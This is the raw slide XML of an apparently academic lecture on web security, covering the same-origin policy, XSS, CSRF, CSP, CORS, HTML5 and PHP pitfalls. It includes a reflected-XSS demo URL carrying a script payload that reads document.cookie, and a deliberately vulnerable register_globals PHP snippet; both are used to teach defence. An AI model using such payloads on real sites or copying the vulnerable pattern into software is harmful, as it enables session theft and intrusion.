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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="353" r:id="rId3"/>
    <p:sldId id="354" r:id="rId4"/>
    <p:sldId id="355" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="337" r:id="rId7"/>
    <p:sldId id="336" r:id="rId8"/>
    <p:sldId id="338" r:id="rId9"/>
    <p:sldId id="342" r:id="rId10"/>
    <p:sldId id="343" r:id="rId11"/>
    <p:sldId id="339" r:id="rId12"/>
    <p:sldId id="340" r:id="rId13"/>
    <p:sldId id="341" r:id="rId14"/>
    <p:sldId id="344" r:id="rId15"/>
    <p:sldId id="346" r:id="rId16"/>
    <p:sldId id="349" r:id="rId17"/>
    <p:sldId id="347" r:id="rId18"/>
    <p:sldId id="350" r:id="rId19"/>
    <p:sldId id="351" r:id="rId20"/>
    <p:sldId id="345" r:id="rId21"/>
    <p:sldId id="348" r:id="rId22"/>
    <p:sldId id="352" r:id="rId23"/>
    <p:sldId id="357" r:id="rId24"/>
    <p:sldId id="358" r:id="rId25"/>
    <p:sldId id="359" r:id="rId26"/>
    <p:sldId id="360" r:id="rId27"/>
    <p:sldId id="361" r:id="rId28"/>
    <p:sldId id="362" r:id="rId29"/>
    <p:sldId id="368" r:id="rId30"/>
    <p:sldId id="367" r:id="rId31"/>
    <p:sldId id="366" r:id="rId32"/>
    <p:sldId id="363" r:id="rId33"/>
    <p:sldId id="364" r:id="rId34"/>
    <p:sldId id="365" r:id="rId35"/>
    <p:sldId id="369" r:id="rId36"/>
    <p:sldId id="370" r:id="rId37"/>
    <p:sldId id="371" r:id="rId38"/>
    <p:sldId id="372" r:id="rId39"/>
    <p:sldId id="373" r:id="rId40"/>
    <p:sldId id="374" r:id="rId41"/>
    <p:sldId id="356" r:id="rId42"/>
    <p:sldId id="375" r:id="rId43"/>
    <p:sldId id="376" r:id="rId44"/>
    <p:sldId id="377" r:id="rId45"/>
    <p:sldId id="378" r:id="rId46"/>
    <p:sldId id="418" r:id="rId47"/>
    <p:sldId id="419" r:id="rId48"/>
    <p:sldId id="420" r:id="rId49"/>
    <p:sldId id="417" r:id="rId50"/>
    <p:sldId id="379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8" r:id="rId67"/>
    <p:sldId id="399" r:id="rId68"/>
    <p:sldId id="400" r:id="rId69"/>
    <p:sldId id="401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40" r:id="rId82"/>
    <p:sldId id="402" r:id="rId83"/>
    <p:sldId id="403" r:id="rId84"/>
    <p:sldId id="404" r:id="rId85"/>
    <p:sldId id="405" r:id="rId86"/>
    <p:sldId id="422" r:id="rId87"/>
    <p:sldId id="421" r:id="rId88"/>
    <p:sldId id="430" r:id="rId89"/>
    <p:sldId id="431" r:id="rId90"/>
    <p:sldId id="432" r:id="rId91"/>
    <p:sldId id="433" r:id="rId92"/>
    <p:sldId id="434" r:id="rId93"/>
    <p:sldId id="435" r:id="rId94"/>
    <p:sldId id="436" r:id="rId95"/>
    <p:sldId id="437" r:id="rId96"/>
    <p:sldId id="438" r:id="rId97"/>
    <p:sldId id="439" r:id="rId98"/>
    <p:sldId id="428" r:id="rId99"/>
    <p:sldId id="429" r:id="rId100"/>
    <p:sldId id="423" r:id="rId101"/>
    <p:sldId id="424" r:id="rId102"/>
    <p:sldId id="425" r:id="rId103"/>
    <p:sldId id="426" r:id="rId104"/>
    <p:sldId id="427" r:id="rId105"/>
    <p:sldId id="441" r:id="rId106"/>
    <p:sldId id="442" r:id="rId107"/>
    <p:sldId id="443" r:id="rId108"/>
    <p:sldId id="444" r:id="rId109"/>
    <p:sldId id="446" r:id="rId110"/>
    <p:sldId id="445" r:id="rId111"/>
    <p:sldId id="447" r:id="rId112"/>
    <p:sldId id="448" r:id="rId113"/>
    <p:sldId id="450" r:id="rId114"/>
    <p:sldId id="452" r:id="rId115"/>
    <p:sldId id="453" r:id="rId116"/>
    <p:sldId id="455" r:id="rId117"/>
    <p:sldId id="454" r:id="rId118"/>
    <p:sldId id="451" r:id="rId119"/>
    <p:sldId id="456" r:id="rId120"/>
    <p:sldId id="462" r:id="rId121"/>
    <p:sldId id="457" r:id="rId122"/>
    <p:sldId id="458" r:id="rId123"/>
    <p:sldId id="459" r:id="rId124"/>
    <p:sldId id="460" r:id="rId125"/>
    <p:sldId id="461" r:id="rId126"/>
    <p:sldId id="467" r:id="rId127"/>
    <p:sldId id="463" r:id="rId128"/>
    <p:sldId id="464" r:id="rId129"/>
    <p:sldId id="465" r:id="rId130"/>
    <p:sldId id="466" r:id="rId131"/>
    <p:sldId id="468" r:id="rId132"/>
    <p:sldId id="469" r:id="rId133"/>
    <p:sldId id="470" r:id="rId134"/>
    <p:sldId id="471" r:id="rId135"/>
    <p:sldId id="472" r:id="rId136"/>
    <p:sldId id="473" r:id="rId137"/>
    <p:sldId id="474" r:id="rId138"/>
    <p:sldId id="475" r:id="rId139"/>
    <p:sldId id="476" r:id="rId140"/>
    <p:sldId id="477" r:id="rId141"/>
    <p:sldId id="478" r:id="rId142"/>
    <p:sldId id="479" r:id="rId143"/>
    <p:sldId id="480" r:id="rId144"/>
    <p:sldId id="481" r:id="rId145"/>
    <p:sldId id="482" r:id="rId146"/>
    <p:sldId id="483" r:id="rId147"/>
    <p:sldId id="484" r:id="rId148"/>
    <p:sldId id="485" r:id="rId149"/>
    <p:sldId id="487" r:id="rId150"/>
    <p:sldId id="488" r:id="rId151"/>
    <p:sldId id="490" r:id="rId152"/>
    <p:sldId id="491" r:id="rId153"/>
    <p:sldId id="492" r:id="rId154"/>
    <p:sldId id="489" r:id="rId155"/>
    <p:sldId id="493" r:id="rId156"/>
    <p:sldId id="494" r:id="rId157"/>
    <p:sldId id="495" r:id="rId158"/>
    <p:sldId id="496" r:id="rId159"/>
    <p:sldId id="497" r:id="rId160"/>
    <p:sldId id="498" r:id="rId161"/>
    <p:sldId id="499" r:id="rId162"/>
    <p:sldId id="500" r:id="rId163"/>
    <p:sldId id="335" r:id="rId1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Variable, function, array, object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313575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XHR introduced by Microsoft in IE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16344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Auto-sanitization requires context-sensitivity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32181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73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eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design/" TargetMode="Externa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hyperlink" Target="http://cs.ucsb.edu/~kapravel/publications/usenix2014_hulk.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wkr.io/assets/publications/dimva2013sentinel.pdf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chrome.com/extensions/samples" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wkr.io/assets/publications/raid2014csp.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.html5rocks.com/en/tutorials/security/content-security-polic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earch.com/search?q=Christo+Wilson" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.websearch.com/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com/page.html?default=%3cscript%3ealert(document.cookie)%3c/script" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://site.com/page.html?default=French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hyperlink" Target="http://www.bofw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com/search?q=whatever" TargetMode="Externa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int.cia.gov/projects/hitlist.html" TargetMode="Externa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9: The Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(SOP, XSS, CSRF, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML5, CSP, CORS, etc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HTML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838200" y="1519881"/>
            <a:ext cx="10515600" cy="4657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&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr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html&gt;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head&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr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 smtClean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  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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18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I am 12 and what is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sz="18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wierd_thing.html</a:t>
            </a:r>
            <a:r>
              <a:rPr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1800" dirty="0" smtClean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a&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr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 smtClean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“http://www.images.com/cats/adorablekitten.jpg"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275440" y="1273090"/>
            <a:ext cx="2965620" cy="1322174"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60833"/>
              <a:gd name="adj2" fmla="val 115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HTML may embed other resources from the same origin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6258700" y="2928640"/>
            <a:ext cx="3398107" cy="1322174"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39378"/>
              <a:gd name="adj2" fmla="val 83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 or from other origins (cross origin embedding)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9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Unrestricted Uploads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774228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analogous to command injection, apps are often vulnerable to unrestricted uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i.e., file injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One obvious attack is to upload a malicious CGI script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can trick users into visiting the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or, attack the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many other possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload malicious images that attack image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>processing code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> via upload of massive files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite critical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06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popular server-side language for writing web apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., Facebook uses it heavily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the pantheon of web security vulnerabilities, PHP deserves a special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… and not in a good way</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP: A Fractal of Bad Design -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design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Let's look at some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4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register_globals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48873"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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if (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check_authorized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($user)) {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$authorized = true;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if ($authorized) {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// Let the user do admin stuff.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// ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="434340">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="330200" algn="l"/>
                <a:tab pos="6731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65500" algn="l"/>
                <a:tab pos="3708400" algn="l"/>
                <a:tab pos="4051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register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a configuration option for PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Idea is to ease programmer burden by automatically lifting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>parameters into the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>namespace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another way of putting this: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> auto-injects untrusted data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>from the user into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>your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magic_quotes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magic_quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> automatically escapes certain delimiters used in SQL query strings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\” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>added before single </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>quotes, double quotes, backslashes, null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Applied to $_GET, $REQUEST, $_POST, and $_COOKIES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="-83928">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="-83928" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>magic_quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> was introduced to help prevent] code written by beginners from being dangerous. [It was originally intended as a] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>convenience </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>feature, not as a security feature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-8392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954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magic_quotes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magic_quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is fundamentally broken</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>magic_quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is enabled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by default in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a configuration file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escapes all user data, not just data inserted into a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn't protected against data pulled from a database and re-inserted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn't handle multi-byte character encodings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doesn't even follow the standard for delimiter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>escaping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and sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CORS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage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Side Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server Side Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Shell Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unrestricted Uploads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HTML5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HTML5 is the latest revision of the HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>standard (Oct. 2014)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Added </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>many new features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Canvas, audio, and video tags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Offline web apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Drag-and-drop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-frame/document messaging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We'll look at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML5’s new security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>APIs and vulnerabilities associated with these new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in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experts say the SOP isn’t strong enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP assumes that all origins have equivalent capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i.e. any origin may serve &lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leads to some XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP doesn’t allow origins to specify constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>i.e. &lt;scripts&gt; from any origin may POST to any other origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Leads to some CSRF attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web developers say SOP is too restrictive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP forbids XHR requests to other origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevents access to web APIs like Google Maps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forbids sharing with content between iframes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739673" y="2096278"/>
            <a:ext cx="2066759" cy="2425959"/>
            <a:chOff x="8739673" y="2226906"/>
            <a:chExt cx="2066759" cy="2425959"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Right Brace 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8739673" y="2226906"/>
              <a:ext cx="566058" cy="2425959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79429" y="3024386"/>
              <a:ext cx="1227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CSP</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>sandbox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39673" y="4851918"/>
            <a:ext cx="2667885" cy="1265853"/>
            <a:chOff x="8739673" y="4851918"/>
            <a:chExt cx="2667885" cy="1265853"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Right Brace 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8739673" y="4851918"/>
              <a:ext cx="566058" cy="1265853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79429" y="5069345"/>
              <a:ext cx="1828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postMessage</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>CORS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1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Attacks, Revisited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45064" y="2728059"/>
            <a:ext cx="1841638" cy="326841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9215122" y="4900706"/>
            <a:ext cx="2394857" cy="1130897"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70980"/>
              <a:gd name="adj2" fmla="val -10792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is where data gets stolen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5901" y="1853682"/>
            <a:ext cx="6273397" cy="4898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Observation: normally, bofw.com would never send requests to evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Developers at friendly.com could probably enumerate all other valid origins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code.jquery.com, google-analytics.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Idea: what if an origin could whitelist valid origins as well as their capabilities?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24" y="2849373"/>
            <a:ext cx="747017" cy="74701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39939" y="54590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evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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98" y="4791692"/>
            <a:ext cx="663949" cy="6639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69" y="4579765"/>
            <a:ext cx="641882" cy="6418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49" y="1310733"/>
            <a:ext cx="925339" cy="925339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stCxn id="36" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8106569" y="3596390"/>
            <a:ext cx="10164" cy="1096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748451" y="3122256"/>
            <a:ext cx="1233539" cy="13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748451" y="3470443"/>
            <a:ext cx="10993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2"/>
            <a:endCxn id="36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8116733" y="2236072"/>
            <a:ext cx="9186" cy="613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9240838" y="2543393"/>
            <a:ext cx="2476610" cy="1492117"/>
            <a:chOff x="7938083" y="2817346"/>
            <a:chExt cx="2476610" cy="149211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507660" y="3909353"/>
              <a:ext cx="1210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38083" y="2817346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974303" y="2861474"/>
              <a:ext cx="440390" cy="23650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596446" y="834621"/>
            <a:ext cx="19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Reflected XSS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624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Transfer Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intended for downloading HTML documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be generalized to download any kind of file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP message format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Text based protocol, typically over TCP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Stateless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Requests and responses must have a header, body is optional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Headers includes key: value pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Body typically contains a file (GET) or user data (POST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Various versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0.9 and 1.0 are outdated, 1.1 is most common, 2.0 has just been ratified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Security Policy (CSP)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CSP is a browser security framework proposed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brandon Sterne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at Mozilla in </a:t>
            </a:r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Moves the browser from a default-trust model to a whitelisted model</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Originally intended as an all-encompassing framework to prevent XSS and CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also be used more generally to control app/extension behaviors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSP allows developers to specify per-document restrictions in addition to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server specifies policies in a header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
